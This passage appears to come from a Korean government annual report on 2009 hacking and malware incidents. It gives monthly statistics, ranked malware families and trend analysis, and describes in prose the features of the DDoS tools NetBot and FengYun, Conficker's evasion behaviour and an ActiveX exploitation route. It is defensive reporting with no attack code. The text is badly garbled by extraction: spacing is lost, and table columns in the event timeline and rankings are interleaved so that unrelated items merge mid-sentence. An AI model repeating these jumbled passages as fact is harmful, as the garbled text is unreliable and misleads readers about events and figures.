국내침해사고대응협력체계강화활동과침해사고대응협력관련국제기구 활동, 아태 정보보호교육내용과함께향후발생가능한사이버공격의유형 예상및대응방안을모색하기위한사이버공격가상시나리오공모전에 대하여정리하였다. -5-

제장침해사고대응역량강화에서는스마트폰보급확대에따라모바일 5 악성코드의발생가능성및위험이점차증가하고있어대응능력및역량을 강화하기위한국내모바일침해사고공동대응훈련내용과대학정보보호 동아리지원, 방어능력향상을위한제6 회해킹방어대회, 침해사고예방교육및 세미나를통한대국민침해사고역량강화활동에대하여설명하고있다. 또한, 인터넷침해사고에대한향후공격전망에대한기술및예방방법을 요약하여결론을제시하고있다. 부록에서는운영체제별보안권고문과패치배포사이트목록, 2009년 보안공지문등록현황, 경보체계, 해킹 바이러스대응기관연락처, 마이크로 소프트윈도우취약점패치및발표현황을첨부하여정보시스템실무담당자, 보안관리자및일반이용자가침해사고예방및대응시도움이되도록 하였다. -6-

제 2 장 2009년침해사고동향및전망 제 1 절국내민간부문해킹바이러스 통계및분석 1. 2009 년주요취약점웜 / ㆍ바이러스동향및정보보호이슈 구분국내해외 1월 2월 3월 4월 5월 6월 o 평가원수능자료등주요자료유출 o 오바마대통령, 브리트니스피어스등 33 o 사고발생오바마대통령취임악용한악성코드확산 o 명의유명인사들의트위터계정해킹미국경기침체로인한가짜바이러스, 피 주의경고 싱등사이버범죄증가 o USB를통하여전파되는악성코드피해주의권고 o 로이터통신을가장한바이러스가전세 o PC 시간을변경하는 2090 악성코드피해 계적으로유포 주의권고 o 중국, 해킹또는해킹도구를제공등불법 o DDoS 방어전문보안업체가특정사이트를공격하고막아주는대가로돈을챙긴혐의로구속 행위에대해처벌할수있는법적근거를마련 oconficker변종악성코드감염으로인한피 o 중국에의해서동남아시아를비롯한유럽해주의권고등의주요정부기관및대사관의 Ghost o 한국마이크로소프트(MS) 는 19일차세대웹라는트로이목마에감염되어주요기밀정브라우저 ' 인터넷익스플로러 8(IE8)' 정식보들이외부로유출버전발표 o 러시아에서은행현금자동인출기(ATM) 에 o 온라인게임업데이트과정에서실수로사침투해고객예금을노리는새로운유형의용자에게 DDoS 공격을일으키는악성코드악성컴퓨터바이러스발견가유포 o MS Office PowerPoint 원격코드실행취약 o 중국정부컴퓨터, 대만출신으로추정되점피해주의권고는해커에의해해킹당하여중국원자바 05/13 보안패치발표오( 溫家寶 ) 총리의 정부공작보고서 를포 oms08-067취약점을악용한 Conficker웜의함한기밀문서들이유출증가에따른사용자 PC 감염확인서비스 o 美 US-CERT, SI( 신종플루) 이메일이용한제공( 보호나라홈페이지) 개인정보탈취 ' 악성코드. 피싱' 주의권고 o Microsoft IIS(5,5.1,6) WebDAV 인증우회 o 시만텍, 구글검색결과를조작해정상적취약점으로인한피해주의권고인구글광고대신악성사기웹사이트로 06/10 보안패치발표연결되는광고와링크를삽입하는악성코 o Microsoft ActiveX DirectShow의원격코드드위협경고실행취약점으로인한피해주의권고 07/15 보안패치발표 o 시만텍, 소셜네트워킹서비스인 ' 트위터 o Adobe Acrobat/Reader 다중취약점보안 (Twitter)' 초청장을가장한악성웜발견, 업데이트권고사용자주의권고 o DNS 트래픽유발하는스팸메일악성코드 o 이메일에본문에포함된마이클잭슨사감염주의권고망동영상위장개인정보탈취악성코드주의보 -7-

7월 8월 9월 10월 11월 12월 o 국내외주요사이트대상 DDoS 공격발생 (7.7 DDoS 침해사고) o 최신 Symbian OS를대상으로동작하는 사이버 위기경보 단계 주의 발령(7/8 악성코드의등장 02:00), 주의 관심(7/15 15:00) o 미하원, 정부기관의 P2P 접근제한관련 o MS IE 및 Visual Studio 관련긴급보안업 청문회개최 데이트발표 o 美, 대규모신용카드정보유출해킹사고 적발 o 메신저쪽지이용한해킹기승 o 중국, 그린댐( 터넷필터링) 프로그램강제 o 815 광복절 겨냥, 한일 네티즌간 일부 계획철회 커뮤니티사이트대상 DDoS 사이버전 o 트위터, 페이스북등유명네트워킹사이 트가해커의공격을받아서비스일시중 단 o 7.7 DDoS 공격관련사이버위기경보단 o 美신규사이버보안시스템, 민간분야감계 ' 관심' ' 정상' 환원조정(9/17 12:00) 시우려제기 o MS IIS FTP 서비스의원격코드실행취약 o 영국정보국보안부(Security Service, SS) 점주의는새롭게설립한사이버보안운영센터 10/13 보안패치발표 (CSOC, Cyber Security Operations o 제로보드 4.1pl9 신규취약점및배포 서비 Centre) 에서 50명의전직해커를고용스중지에따른주의 o 미국토안보부(DHS), 테러방지를위한정 o Adobe Reader/Acrobat 신규취약점으로보공유및조정을위해지식정보공유통인한피해주의합관리소신설 10/13 보안패치발표 o 美 Comcast社는자사고객PC가악성코드 o MS Windows 부팅불능악성코드감염주에의한감염증상이발생되는경우, 고객의에게자동경고및치료서비스제공개시 o 美 국토안보부(DHS) 사이버안보ㆍ커뮤니 o MS IE Style Object 제로데이취약점으로 케이션통합센터'(NCCIC) 개소 인한피해주의 o iphone에서동작하는 Worm이최초로발 12/9 보안패치발표 견 o 국내 외주요보안업체홈페이지잇단해 o 미국과유럽연합(E.U.), 국제사이버범죄 킹사고발생 에대한해결을위해보다강화된공조체 계를확립하기로합의 o 美트위터, 해킹으로한때서비스중단 omsiis파일확장자처리오류취약점주의 o 미국, 러시아및유엔군비통제위원회와 o Adobe Reader/Acrobat 신규취약점으로 인한피해주의 인터넷보안강화및사이버공간의군사적이용제한에대한협의를시작 -8-

2. 2009 년침해사고주요통계현황 가. 침해사고주요통계 2009 년한해동안방송통신위원회에서접수처리한 민간부문침해 사고통계를분석한결과, 웜 바이러스신고건수는총 10,395건으로 2008 년(8,469 건) 에비하여 22.7% 증가하였으며, 해킹사고접수 처리건수는 총 21,230건으로 2008 년(15,940 건) 에비하여 33.2% 증가하였다. [ 표 2-1] 월간침해사고전체통계 구분 2008 년총계 2009년 2009년 1 2 3 4 5 6 7 8 9 10 11 12 총계 웜 바이러스 8,469 460 641 695 925 941 837 886 879 1,591 844 1,002 694 10,395 해킹신고처리 15,940 1,579 1,119 1,285 1,582 1,863 2,319 2,200 2,704 2,676 1,748 1,011 1,144 21,230 - 스팸릴레이 6,490 617 495 599 764 1,134 1,290 1,392 1,108 1,002 1,012 409 326 10,148 - 피싱경유지 1,163 65 72 86 51 88 100 68 104 103 105 73 73 988 - 단순침입시도 3,175 194 230 219 162 210 282 244 231 285 232 215 239 2,743 - 기타해킹 2,908 277 225 291 299 238 261 245 241 247 252 199 256 3,031 - 홈페이지변조 2,204 426 97 90 306 193 386 251 1,020 1,039 147 115 250 4,320 악성봇 (Bot) 8.1% 1.4% 2.0% 1.6% 1.0% 1.0% 0.9% 0.9% 0.6% 0.7% 0.6% 0.6% 0.6% 1.0% ( 그림 2-1) 월별침해사고전체통계그래프 -9-

3. 2009년해킹ㆍ바이러스통계분석 가. 웜 바이러스피해 (1) 웜 바이러스신고건수추이 2009년한해동안웜바이러스 신고건수는 10,395 건( 월평균 866 건) 으로 2008년 8,469 건( 월평균706 건) 대비 22.7% 증가하였다. [ 표 2-2] 월별국내웜바이러스 신고건수 구분 2008 년총계 2009 년 1 2 3 4 5 6 7 8 9 10 11 12 2009 년총계 신고건수 8,469 460 641 695 925 941 837 886 879 1,591 844 1,002 694 10,395 웜바이러스 신고건수는진흥원, 안철수연구소, 하우리가공동으로집계한결과임 2,000 1,800 2008 년 2009 년 1,600 1,591 1,400 1,200 1,000 925 941 837 886 879 844 1,002 800 641 695 694 600 400 460 200 0 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 ( 그림 2-2) 월별국내웜 바이러스신고건수 (2) 주요웜 바이러스피해현황 주요웜 바이러스피해를신고된웜 바이러스의명칭별로분류한결과 2008년과마찬가지로특정온라인게임의계정정보탈취를목적으로하는 - 10 -

ONLINEGAMEHACK 의신고건수가 10.8% 로가장높은비율을차지하 였으며자체전파력은없으나주로웹사이트등을통해감염되어추가적인 악성코드를다운로드하는 AGENT가 10.5% 로그뒤를이었다이외 USB와 같은이동형저장장치를통해전파되어보안설정을변경, 인터넷장애 등을유발하는 Conficker 및변종이다수확인되었고개발환경내특정소스에 코드를삽입시키는새로운전파기법이사용된 INDUC, 국내 외적으로 교묘해진사회공학적악성코드유포수단으로허위백신 S/W, 동영상플레 이어등을가장하여사용자의클릭및결재를유도하는등의피해사례가 특징적이라할수있다. [ 표 2-3] 월별주요웜바이러스 명칭별신고건수 2009 년 순위 1월 2월 3월 4월 5월 명칭건수명칭건수명칭건수명칭건수명칭건수명칭건수 1 AGENT 70 CONFICKER 107 CONFICKER 128 ONLINEGAMEHACK 130 AGENT 135 ONLINEGAMEHACK 118 2 ONLINEGAMEHACK 64 AIMBOT 98 VIRUT 76 AGENT 118 XEMA 134 AGENT 93 3 CONFICKER 63 AGENT 64 AGENT 71 CONFICKER 80 ONLINEGAMEHACK 90 XEMA 93 4 XEMA 55 ONLINEGAMEHACK 60 XEMA 68 XEMA 79 CONFICKER 64 CONFICKER 57 5 AUTORUN 18 XEMA 56 ONLINEGAMEHACK 58 VIRUT 50 DOWNLOADER 35 HUPIGON 29 6 MALPACKEDB 13 DOWNLOADER 26 IRCBOT 38 AUTORUN 42 HUPIGON 33 MAGANIA 29 7 KIDO 9 VIRUT 17 AUTORUN 21 DOWNLOADER 37 VIRUT 31 AUTORUN 23 8 DOWNLOADER 9 AUTORUN 17 BOBAX 19 HUPIGON 26 IRCBOT 21 DOWNLOADER 22 9 GRUM 5 UPACK 14 PAKES 15 BAGLE 22 AUTORUN 16 VIRUT 21 10 BAGLE 5 IRCBOT 11 DOWNLOADER 15 KEYLOGGER 16 AVKILLER 15 NATICE 16 기타 149 기타 171 기타 186 기타 325 기타 367 기타 336 합계 460 합계 641 합계 695 합계 925 합계 941 합계 837 6 월 - 11 -

2009 년 순위 7월 8월 9월 10월 11월 명칭건수명칭건수명칭건수명칭건수명칭건수명칭건수 1 ONLINEGAMEHACK 146 XEMA 98 INDUC 692 INDUC 124 MALWARE 86 ONLINEGAMEHACK 93 2 AGENT 117 AGENT 75 ONLINEGAMEHACK 107 ONLINEGAMEHACK 83 AGENT 80 AGENT 76 3 XEMA 114 ONLINEGAMEHACK 67 XEMA 100 FAKEAV 76 XEMA 66 MAGANIA 64 4 CONFICKER 71 IRCBOT 50 AGENT 93 XEMA 57 DOWNLOADER 60 XEMA 63 5 DOWNLOADER 35 CONFICKER 49 CONFICKER 61 AGENT 53 INDUC 58 DOWNLOADER 38 6 MAGANIA 33 VIRUT 43 ALUREON 48 MALWARE 37 ONLINEGAMEHACK 51 AUTORUN 25 7 MYDOOM 27 HUPIGON 40 DOWNLOADER 46 MAGANIA 26 ZBOT 37 MALWARE 25 8 HUPIGON 23 DOWNLOADER 38 AUTORUN 30 CONFICKER 23 AUTORUN 30 INDUC 17 9 VIRUT 15 MAGANIA 27 HUPIGON 26 DOWNLOADER 20 VBNA 29 BAGLE 16 10 AUTORUN 15 INDUC 22 TDSS 23 HUPIGON 18 MAGANIA 29 DAONOL 12 기타 290 기타 370 기타 365 기타 327 기타 476 기타 265 합계 886 합계 879 합계 1,591 합계 844 합계 1,002 합계 694 12 월 나. 해킹사고 (1) 해킹사고접수처리현황 2009 년도국내민간부문해킹사고접수 처리건수는총 21,230건으로 2008년 15,940건에비하여 33.2% 증가하였다. 침해사고유형별로스팸 릴레이, 기타해킹, 홈페이지변조는각각전년대비 56.4%, 4.2%, 96% 증가 하였으며, 피싱경유지, 단순침입시도는각각전년대비 15%, 13.6% 감소 하였다. 구분 2008 년총계 [ 표 2-4] 해킹사고처리현황 2009 년 1 2 3 4 5 6 7 8 9 10 11 12 2009 년총계 스팸릴레이 6,490 617 495 599 764 1,134 1,290 1,392 1,108 1,002 1,012 409 326 10,148 피싱경유지 1,163 65 72 86 51 88 100 68 104 103 105 73 73 988 단순침입시도 3,175 194 230 219 162 210 282 244 231 285 232 215 239 2,743 기타해킹 2,908 277 225 291 299 238 261 245 241 247 252 199 256 3,031 홈페이지변조 2,204 426 97 90 306 193 386 251 1,020 1,039 147 115 250 4,320 합계 15,940 1,579 1,119 1,285 1,582 1,863 2,319 2,200 2,704 2,676 1,748 1,011 1,144 21,230-12 -

스팸릴레이 : 타시스템을스팸메일발송에악용한공격 피싱경유지 : 보안이취약한국내시스템이주로해외위장사이트로악용된신고가접수되어 처리한건수단순침입시도 : 인터넷상에연결된시스템의취약점을찾기위하여네트워크서비스를파악해 보는공격( 주로자동화된해킹도구, 웜 바이러스에의한감염시도트래픽이포함됨) 기타해킹 : 진흥원으로접수된침해사고가운데기타분류항목 ( 원격터미널접속, 웹서비스 대상해킹시도, 의도적인스캔공격, 이메일로접수된악성코드은닉사이트신고등이포함됨) 홈페이지변조 : 해커가공명심, 정치적목적등의이유로홈페이지를변조하는사고. 홈페이지만 변조되며, 홈페이지방문자에게는서비스이용의불편을끼칠뿐개인정보유출등의악의적인 행위를가하지않음 2009 년한해동안해킹사고접수처리건수유형별로는스팸릴레이가 47.8% 로차지하는비율이가장많았고홈페이지변조(20.3%), (14.3%), 단순침입시도(12.9%), 피싱경유지(4.7%) 순이었다. 기타해킹 ( 그림 2-3) 해킹사고접수처리건수유형별분류 (2) 해킹사고피해기관별분석현황 2009 년한해동안접수처리된해킹사고를피해기관별로분류한결과 기타( 개인), 기업, 대학, 비영리의순으로, 기타( 개인) 가차지하는비율이 76.3% 로가장높았으며뒤를이어기업이차지하는비율이 19.7% 로 - 13 -

나타났다. 기타( 개인) 가차지하는비율은 08년 74.1% 에서 09년 76.3% 로 소폭증가하였으며이는개인인터넷이용자의 경우가많기때문인것으로파악되었다. PC가침해사고에악용되는 [ 표 2-5] 해킹사고피해기관별분류 기관 2008 년총계 2009 2009년 1 2 3 4 5 6 7 8 9 10 11 12 총계 기업 3,344 458 316 273 228 316 396 368 401 375 355 406 294 4,186 대학 603 41 31 48 49 44 59 53 41 73 55 49 55 598 비영리 173 18 14 13 15 23 29 26 27 17 23 22 11 238 연구소 2 1 0 0 0 0 0 0 0 0 0 0 0 1 네트워크 0 0 0 0 0 0 0 1 0 0 0 0 0 1 기타 ( 개인 ) 11,818 1,061 758 951 1,290 1,480 1,835 1,752 2,235 2,211 1,315 534 784 16,206 총계 15,940 1,579 1,119 1,285 1,582 1,863 2,319 2,200 2,704 2,676 1,748 1,011 1,144 21,230 기관분류기준 : 침해사고관련도메인이나 IP 를기준으로기업(co,com), 대학(ac), 비영리 (or,org), 연구소(re), 네트워크(ne,net), 기타(pe 또는 ISP에서제공하는유동 IP 사용자) 로분류 ( 그림 2-4) 해킹사고피해기관별분류 (3) 해킹사고피해운영체제별분석현황 2009 년한해동안해킹사고를피해운영체제별로분류한결과윈도우즈 운영체제가전체의 66.8% 로가장많았으며리눅스운영체제는전체의 - 14 -

20.7% 로나타났다. 해킹사고피해운영체제별비율중윈도우즈가차지 하는비율은전년의 68% 대비소폭감소하였으나 2009년발생한침해 사고가주로윈도우즈를사용하는개인 전년도와마찬가지로가장많았기때문이다. PC를대상으로하는침해사고로 [ 표 2-6] 월별해킹사고피해운영체제별분류 운영체제 2008 년총계 2009 년 1 2 3 4 5 6 7 8 9 10 11 12 2009 년총계 Windows 10,834 866 769 891 1,176 1,483 1,666 1,742 1,513 1,377 1,358 700 633 14,174 Linux 2,744 481 170 174 160 150 405 258 952 978 215 142 315 4,400 Unix 192 15 32 37 28 39 63 28 54 133 11 36 14 490 기타 2,170 217 148 183 218 191 185 172 185 188 164 133 182 2,166 합계 15,940 1,579 1,119 1,285 1,582 1,863 2,319 2,200 2,704 2,676 1,748 1,011 1,144 21,230 운영체제별분류자료는각운영체제의안전성과는상관관계가없으며, 분석자료임 단지신고에따른 Unix 2.3% Linux 20.7% Windows 66.8% ( 그림 2-5) 해킹사고피해운영체제별분류 다. 국내악성봇(Bot) 감염비율 2009 년한해동안진흥원내에구축된허니넷(HoneyNet) 에유입되는공격 트래픽분석을통해추정한전세계감염추정 PC 중국내 비율은평균 1.0% 로전년대비(8.1%) 1/8 이하로감소하였다. - 15 -

[ 표 2-7] 월별국내악성봇(Bot) 감염률 구분 2008 년평균 2009 년 1 2 3 4 5 6 7 8 9 10 11 12 2009 년평균 국내비율 8.1% 1.4% 2.0% 1.6% 1.0% 1.0% 0.9% 0.9% 0.6% 0.7% 0.6% 0.6% 0.6% 1.0% 전세계Bot 감염추정PC 중국내Bot 감염PC가차지하는비율임 봇(Bot) : 운영체제취약점, 비밀번호취약성, 웜바이러스의 백도어등을이용하여전파되며, 명령전달사이트와의백도어연결등을통하여스팸메일전송이나 DDoS 공격에악용가능한프로그램또는실행가능한코드 악성코드에감염된 PC에의하여악성코드전파를목적으로하는 TCP/445 및 TCP/139포트에대한스캔비율이계속적으로높은수준을 유지하고있는것이확인되고있으므로사용자들은최신 보안패치및 PC 자동보안업데이트를활용하는등외부로부터의공격및악성코드감 염예방을위한지속적인주의및관심을가져야하겠다. MS ( 그림 2-6) 월별국내악성봇(Bot) 감염률 - 16 -

제 2 절악성코드동향및전망 1. 개요 2009 년은다양한유형의악성코드가출현하여개인정보유출, 스팸메일, 시스템파괴및금전적이득을목적으로하는 DDoS 공격등에활용되 었으며, 악성코드의대량생산이가능하도록자동화된공격도구를이용하는 사례가지속적으로발생하였다. 더불어해당악성코드의공격성공률과 생존력을향상시키기위한고도의역공학 분석방해기술이접목된사례가 다수확인되었다. 2010 년은올해와마찬가지로금전적이득을취할목적으로악성 코드가제작될것으로전망되며다양한유형의분석방해기법이출현 하여침해사고대응을지연시킬사례가증가할것으로예상된다. 더불어, 기존운영체제의취약점을악용하는방식보다다수의이용자를보유하고 있는응용프로그램( 소프트웨어) 의취약점을통한악성코드감염및전파가 성행할것으로예상되어무엇보다도인터넷이용자들의보안인식제고가 요구되는해가될것으로보인다. 2. 2009 년악성코드동향 금년은지난해와같이많은신 변종악성코드가출현하여침해 사고를유발시켰다. 또한, 7.7 DDoS 침해사고와같은사회적인혼란을 일으키는형태로발전한사례가나타났으며정보유출, 스팸발송및금전적 이득을취하기위한 DDoS 공격등개인과기업을대상으로하는침 해사고가꾸준하게발생하였다. 더불어, 자동화된악성코드제작도구의 이용과악성코드에접목된기술이점차로대응및치료가어렵도록진화 하고있다. 2009 년악성코드의주요동향및특징을살펴보면다음과같다. - 17 -

가. 홈페이지은닉악성코드의지속적인위협 (1) 인터넷이용자의대다수가이용하는홈페이지( 웹사이트) 는악성코드 전파경로의중요수단이되기도한다.2009년도에도해킹된홈페이지를 통하여이용자들에게전달되는악성코드가지속적으로발생하였다. 특히, 이러한홈페이지를통하여다운로드되는악성코드들중로컬시 스템에설치된소프트웨어(Adobe Acrobat, MS Office 보안취약점등) 의 취약점을악용하는사례가 50% 이상을차지한다는점이다. 이는향후, 침해사고분석및대응관점이운영체제에서응용프로그램으로변화가필요 하다는것으로해석될수있다. ( 그림 2-7) 홈페이지은닉사고처리건수추이 (2) 또한, 해킹된홈페이지로부터다운로드되는악성코드는그자체로서 악성행위를수행하기보다는추가적인악성코드를다운로드하거나 생성하는유형이다수를차지하였다. 이는홈페이지접속으로인한 피해는물론추가적인침해사고를유발시킬수있는요인을내포하고 있다고볼수있다. - 18 -

( 그림 2-8) 홈페이지은닉악성코드동향 나. 금전적이익을취득할목적의악성코드의지속적위협 기업을대상으로금전적인이익을목적으로 DDoS 공격 협박을시도 하고이에응하지않을경우, 실제로공격을시도하는사례가올해에도 다수발생하였다. 이는주로고가의 DDoS 방어장비를구축하기 어려운기 업을대상으로발생하고있으며, 과거의특정형태의사이트에대한공격에서 탈피하여여행사, 증권사, 호스팅업체등일반사업체를대상으로공격 범위가확대되고있다. 이러한 DDoS 공격에는 NetBot 을이용하여제작된 악성코드들이많이악용되고있다. 대부분의 공격수단으로이용하므로인터넷이용자는자신의 DDoS 공격은감염된개인 PC를 PC가침해사고유발을 위한좀비 PC 로악용되지않도록항상악성코드감염에주의해야한다. 다. 이벤트를이용한스팸발송악성코드의유포 지난해와마찬가지로발렌타인데이, 화이트데이, 크리스마스등일련의 이벤트를계기로인터넷이용자를현혹( 사회공학적인기법) 시켜악성코드에 감염시킨후광고성스팸을대량으로발송하는사례가지속적으로 발생하였다. 대부분의스팸발송은감염된개인 PC를공격수단으로 이용하므로인터넷이용자는자신의 PC가침해사고유발을위한좀비PC로 악용되지않도록항상악성코드감염에주의해야한다. - 19 -

라. 사회적인이슈를악용한악성코드의유포 2009 년에는마이클잭슨사망, 오바마美대통령당선, 前대통령들의연이은 서거등국내 외적으로사회적인이슈가많이발생하여인구에회자되었다. 이러한사회적인이슈는악성코드및스팸제작자들에게는자신들이제작한 악성코드전파를위한매우좋은기회로연결될수있다. 인터넷이용자들은 게시글및수신된메일확인시이러한점을감안하여접속및다운로드를 자제해야한다. 마. 악성코드대량생산을위한자동화된도구의이용 지난해 NetBot을이용하여 DDoS 에이전트를손쉽게제작할수있는 도구가개발되어상업적으로판매되었다. 올해에는이와더불어 풍운 ( 風雲, FengYun) 이라는 DDoS 공격도구가인터넷에공개되어 DDoS 공격에악용되었다. 위두가지도구는사용자인터페이스(UI) 를 제공하여손쉽게이용할수있는기회를제공하였고기존의악성코드제작을 위해소요되는시간을단축시켜대량생산을가능하도록환경을조성한대표 적인예라고할수있다. 이로써변종악성코드의출현주기가짧아져이에 대한대응노력및비용의증가를초래했다고할수있다. 바. 분석지연을위한고도의분석방해기술의접목 지난 7.7 DDoS 침해사고를유발한악성코드는미리정해진시나리오를 기반으로공격을수행하는형태로서기존의 C&C 접속후명령을전달받는 유형에비해대응및조치가어려웠다. 이러한Time-Bomb 형태의악성 코드에서적당한공격시점을알아낸후대응하는일련의과정은많은 분석시간을필요로한다. 또한, 최근의악성코드는여러가지악성행위를 포함하고있으며분석도구우회, 가상머신탐지, 압축(Packing) 적용등을 통하여분석이난해하도록진화하고있다. - 20 -

사. 응용프로그램취약점을악용한악성코드전파 MS Office, Adobe Acrobat 및 Flash Player 등파일문서에공격코드를은닉시켜, 감염된사용자의정보를유출시키는사고가다수보고되고있다. 사용자는자신의 PC에설치된윈도우즈의보안업데이트는물론 Office, Acrobat 등자주사용하는소프트웨어대한지속적인패치관리에도주의가필요하다. 아. 악성코드정보의인터넷공유 최근인터넷으로부터악성코드의모태가될수있는정보를손쉽게획득 하여이를재배포할수있는기회가많아졌다. 지난 11월아이폰악성 코드가한달사이에 3종이발생한것도한때최초아이폰악성코드의 소스코드가공개되었던것에기인한것으로판단된다. 더불어인터넷전화 감청바이러스(Skype Trojan) 도공개된적이있어향후인터넷상의무수한 악성코드정보를활용한변종발생가능성이높아지고있다. 3. 감염사례별상세 가. 공격의용이성및악성코드대량생산을위한제작도구의활용 지난 7.7 DDoS 공격으로국내주요포털, 금융, 정부기관의사이트의접속이 지연되는등장애가발생하였다. 금번 DDoS 공격은자동화된공격도구에 의한공격은아니었지만최근발생하는 DDoS 공격의추세를살펴보면 Netbot Attacker와같은자동화된공격도구를통한공격이주를 이루고 있다. 이는컴퓨터에대한전문화된배경지식이없더라도공격도구설명서에 따라누구나쉽게 DDoS 공격을수행할수있기때문이다. 최근 Netbot Attacker 이외에도풍운이라는 DDoS 공격도구가중국의공격도구판매 사이트및커뮤니티에서거래되고있다. - 21 -

( 그림 2-9) 풍운도구의사용자인터페이스 (1) 주요기능 풍운과 NetBot은 DDoS 공격도구로아래와같이선택적으로 DDoS 공격을 수행할수있다. 공격유형 UDP, SYN, TCP, ICMP, TCP 동시등 ( 그림 2-10) 풍운과 Netbot의공격유형선택 (2) 추가기능 풍운은추가좀비 PC 에게원격다운로드, 무한 HTTP 다운로드, 로그오프, 종료, 방화벽종료와같은명령을내릴수있다. - 22 -

나. DDoS 공격대상의확대 주로성인사이트나도박사이트등불법사이트를대상으로많이발생하였던 DDoS 공격의범위가확대되어, 금년에는금융사이트및일반포털사이 트에서도발생하였다. 특히,7.7침해사고는평소의공격대상과는다르게 주요정부기관도포함되어있어, DDoS 공격이기존의금전적인이득을 위한단순공격에서사회혼란을유발시킬수있는공격으로진화될수있 음을보여주었다. 더불어앞서언급한 DDoS 제작도구를이용하면누 구나손쉽게공격을감행하고있어이에대한대응기술마련이요구된다. 다. 소프트웨어취약점을악용한악성코드전파 최근운영체제의보안이강화되면서응용프로그램의취약점을악용하여 악성코드를전파하는사례가증가하고있다. 지난 09년2월이슈가되었던 Conficker 악성코드는 P2P 응용프로그램의취약점을악용한사례중의하나 이다. 해당악성코드는 08년도하반기에최초로발생한후다양한기능들이 추가되면서 4가지의변종들이발생하였다. [ 표 2-8] Conficker 악성코드변종이력 날짜변종명변종주요특이점 2008-11-21 Conficker.A MS08-067 취약점악용 DNS 후킹 250 도메인/ 일 MD5 + 1024-bit RSA 인증서 2008-12-29 Conficker.B 네트워크공유를통한감염 USB를통한전파기능 MD6 + 4096-bit RSA 인증서 2009-02-20 Conficker.C MS08-067을취약점을이용한P2P 통신 2009-03-04 Conficker.D Conficker.D 감염 PC간 P2P 통신 50,000 도메인/ 일악성코드자체의전파기능없음 - 23 -

[ 표 2-9] 감염증상및보호기능 구분 감염증상 보호기능 내용 1 매일임의의문자열로생성된 50,000개의도메인중 500개의도메인에대한접속및추가악성코드다운로드시도 2 P2P 스캔패킷을발생시켜감염된호스트들끼리연결을시도하고생성된 P2P 네트워크에서추가악성코드다운로드 3 특정윈도우보안관련서비스종료 4 다음과같은해당레지스트리값을삭제함 Windows Defender의자동실행방지 방화벽이나보안프로그램의설정비활성화시 wscsvc의경고표시방지 윈도우가안전모드로시작되는것을방해 5 procexp, tcpview, wireshark 등각종모니터링도구를종료시킴 6 microsoft, windowsupdate, hauri, ahnlab 등보안관련특정문자열이포함된도메인들에대한 DNS 요청을차단 (DNS API 후킹) 1 제3자에의한하이재킹을막기위해바이너리파일을암호화및디지털서명 (RC4, RSA, MD6) [4] 2 가상화방지 (VMware / Virtual PC) [11] 3 GetTickCount() 타이밍을사용한안티- 디버깅 [11] 4 디버깅을어렵게하기위해 API 를난독화 (P2P 로직) 또한,Excel의매크로기능및파워포인트취약점을악용한사례도발생하였다. 이는해커들의관점이취약점에대한보안이강화된운영체제를이용하기보다는다수의사용자를보유하고있는응용프로그램에대한공격으로전환될수있다는점을시사하고있다. 라. ActiveX 취약점을악용한악성코드전파의증가 09년 7월 MS社에서는비디오스트리밍 ActiveX 관련취약점에 대한 보안공지를발표하였다. 해당취약점은 Data속성에입력된 gif 파일의크기를 처리하는과정에서버퍼오버플로가발생하는것으로취약한 ActiveX 호출 스크립트로구성되어있는웹사이트와악성코드를원격시스템에업로드 하고해당페이지를유명웹사이트혹은게시판에 iframe을이용하여 삽입한다. 피해자가해당페이지에접속할시취약한 msvidctl.dll은 쉘코드를실행시키고원격지에서악성코드를다운로드및실행하는방식 - 24 -

으로전파된다. ( 그림 2-11) MS비디오스트리밍 ActiveX취약점악용사례 마. 사회공학적인기법을악용한악성코드전파가능성증가 지난 08년 3 월에는 이명박대통령순방일정 이라는제목의해킹메일 피해가확인된바있다. 해당메일의첨부파일 대통령출국일정.xls 에는 Excel Excel 프로그램의취약점을공격하는코드가삽입되어있다. 미패치된 사용자가해당파일을열어볼경우악성코드에감염되며, 감염 후에는키보드입력유출, 사용자화면유출, 공격자원격로그온등의피해가 발생한다. 이와마찬가지로 09년에도마이클잭슨사망, 오바마美대통령당선, 前 대통령들의연이은서거등국내외적으로 사회적인 이슈가많이발생하여 인구에회자되었다. 향후에도이러한사회적인이슈를이용하여인터넷 이용자들을속이는형태로공격하는사례가증가할것으로예상된다. - 25 -

4. 향후전망 가. 금전적인이득을위한 DDoS 공격의지속적인증가 2010년에도악성코드에감염된좀비 PC가 DDoS 공격및스팸메일 발송을위한에이전트로악용되는사고가지속적으로발생할것으로보 이며, 인터넷망전송속도의향상으로인해사용자 PC 인터넷대역폭이 크게확장됨으로인하여,DDoS 공격의파급력은보다커질것으로보인다. 이러한침해사고는개인에게피해를줄뿐만아니라금전적피해는물론 기업의신뢰성을저하시킬수있으며사회혼란을유발시킬수있는형태로 진화할수있다. 나. 자기스스로동작하도록구성된악성코드유형의증가 기존에는악성코드에대한공격자의명령제어서버를차단조치함으로써, 악성코드의활동을효과적으로억제할수있었으나, 웜의생존력을높이기 위하여원격명령전달에 HTTP 프로토콜을활용하거나통신을 P2P 방식 으로변경하는사례가증가할것으로예상되며정해진방법및시간을 이용하여악성코드스스로동작하는유형도늘어날것으로전망된다. 다. 악성코드의자기은폐를위한기술적진화 일부악성코드제작자는악성코드에자신을은폐하거나분석을방해하는 기능또는백신진단을어렵게하기위한기능등을구현해놓는다. 이러한 자기은폐기능을통하여생존시간을늘릴수있으므로이러한기술이 적용된악성코드는향후더욱많아질것으로보인다. - 26 -

라. 웹사이트취약점을이용한피해지속적발생 웹사이트를이용하여악성코드가전파되는사례는 2010년에도지속적 으로발생할것으로보인다. 또한, 국내에서는웹사이트에 ActiveX를 적용한사례가많으므로공격자들은 ActiveX의취약점을악용하여 악성코드전파를시도할수있으므로홈페이지관리자,ActiveX개발자 및인터넷이용자는이러한취약점악용가능성을항상염두해두고 있어야한다. 마. 응용프로그램및알려지지않은취약점을악용하는악성코드의증가 악성코드및취약점에대한운영체제의내성이증가하면서해커들의 관심은다수의사용자를보유하고있어운영체제공격만큼파급력을 높일수있는응용프로그램취약점을악용한공격이증가할것으로전망 된다. 특히, MS Office 및 Adobe Acrobat 등의제품군은주요한공격 대상이될것으로보이며메일첨부등을통하여특정인을대상으로한 공격이 10년에도많이발생할것으로예상된다. 또한, 악성코드제작자 들은감염성공률을높이기위하여알려지지않은취약점을악성코드 전파경로로악용할것으로보인다. 알려지지않은취약점을공격자가먼저 발견하여악용할경우, 당할수있다. 최신패치가되어있는사용자도공격피해를 바. 모바일악성코드의국내발생가능성증가 해외에서는 600 여종의모바일악성코드가발견된것으로보고되고있는데, 